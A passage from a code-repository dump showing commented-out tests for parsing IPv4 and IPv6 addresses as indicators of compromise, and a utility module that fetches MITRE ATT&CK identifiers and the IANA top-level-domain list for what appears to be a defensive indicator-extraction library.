= False 50 | 51 | # try: 52 | # assert len(iocs['ipv4s']) == 1 53 | # assert iocs['ipv4s'][0] == ipv4 54 | # except AssertionError as e: 55 | # failure = True 56 | # print('Failed on ipv4: {}'.format(ipv4)) 57 | 58 | # if failure: 59 | # raise AssertionError('Error parsing ipv4s') 60 | 61 | 62 | # @given(ip_addresses(v=6)) 63 | # @settings(deadline=None) 64 | # def test_ipv6_parsing(ipv6): 65 | # iocs = find_iocs(ipv6) 66 | # failure = False 67 | 68 | # try: 69 | # assert len(iocs['ipv6s']) == 1 70 | # assert iocs['ipv6s'][0] == ipv6 71 | # except AssertionError as e: 72 | # failure = True 73 | # print('Failed on ipv6: {}'.format(ipv6)) 74 | 75 | # if failure: 76 | # raise AssertionError('Error parsing ipv6s') 77 | -------------------------------------------------------------------------------- /utility.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | """Python package for finding observables in text.""" 3 | 4 | import requests 5 | 6 | PRE_ATTACK_URL = "https://raw.githubusercontent.com/mitre/cti/master/pre-attack/pre-attack.json" 7 | ENTERPRISE_ATTACK_URL = "https://raw.githubusercontent.com/mitre/cti/master/enterprise-attack/enterprise-attack.json" 8 | MOBILE_ATTACK_URL = "https://raw.githubusercontent.com/mitre/cti/master/mobile-attack/mobile-attack.json" 9 | 10 | 11 | def _get_id(data): 12 | return data["external_references"][0]["external_id"] 13 | 14 | 15 | def get_pre_attack_data(): 16 | r = requests.get(PRE_ATTACK_URL) 17 | l = r.json()["objects"] 18 | tactics = [_get_id(i) for i in l if i["type"] == "x-mitre-tactic"] 19 | techniques = [_get_id(i) for i in l if i["type"] == "attack-pattern"] 20 | return tuple(tactics), tuple(techniques) 21 | 22 | 23 | def get_enterprise_attack_data(): 24 | r = requests.get(ENTERPRISE_ATTACK_URL) 25 | d = r.json()["objects"] 26 | tactics = [_get_id(i) for i in d if i["type"] == "x-mitre-tactic"] 27 | techniques = [_get_id(i) for i in d if i["type"] == "attack-pattern"] 28 | mitigations = [_get_id(i) for i in d if i["type"] == "course-of-action" and _get_id(i).startswith("M")] 29 | return tuple(tactics), tuple(techniques), tuple(mitigations) 30 | 31 | 32 | def get_mobile_attack_data(): 33 | r = requests.get(MOBILE_ATTACK_URL) 34 | d = r.json()["objects"] 35 | tactics = [_get_id(i) for i in d if i["type"] == "x-mitre-tactic"] 36 | techniques = [_get_id(i) for i in d if i["type"] == "attack-pattern"] 37 | mitigations = [_get_id(i) for i in d if i["type"] == "course-of-action" and _get_id(i).startswith("M")] 38 | return tuple(tactics), tuple(techniques), tuple(mitigations) 39 | 40 | 41 | def get_tlds(): 42 | """.""" 43 | r = requests.get("https://data.iana.org/TLD/tlds-alpha-by-domain.txt") 44 | tlds = r.text.split("\n")[1:-1] 45 | tlds = [i.lower() for i in tlds] 46 | tlds.append("onion") 47 | return tuple(tlds) 48 | 49 | 50 | print(get_pre_attack_data()) 51 | print(get_enterprise_attack_data()) 52 | print(get_mobile_attack_data()) 53 | --------------------------------------------------------------------------------